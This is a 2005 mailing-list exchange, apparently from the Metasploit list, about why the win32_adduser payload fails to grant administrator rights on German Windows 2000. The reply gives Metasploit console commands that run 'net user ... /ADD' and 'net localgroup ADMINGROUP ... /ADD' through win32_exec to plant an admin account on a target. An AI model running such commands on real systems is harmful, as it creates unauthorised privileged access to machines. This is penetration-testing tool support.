Win32 net user /add payload

[hdm at metasploit.com (H D Moore)]

Hello,

The win32_adduser payload is actually just a wrapper around the 
"win32_exec" payload. If you are expoiting any non-English target, the 
administrator group name has to be changed. The easy way is to just run 
the command manually with win32_exec:

msf exploit_name(win32_exec) >  set CMD "cmd.exe /c net user USER 
PASS /ADD && net localgroup ADMINGROUP USER /ADD"

msf exploit_name(win32_exec) > exploit

In the future, we may add an option to this payload to specify the 
language or just the name of the group -- it seems to come up often 
enough =) 

-HD

On Thursday 03 March 2005 18:29, Thomas Schmidt wrote:
> Hi list,
> I noticed a problem with the "net user x x /add" payload on a german
> Win2k SP4. I was able to successfully run some exploits using this
> payload, thereby creating a new user "test" - but this user was not
> added to the "Administratoren"-Group (notice the slightly different
> spelling of the group name on a german W2k box). Is this a
> language-specific problem or did I get something wrong? If it is
> language-specific, how do change the shellcode?
>
> Regards,
> Thomas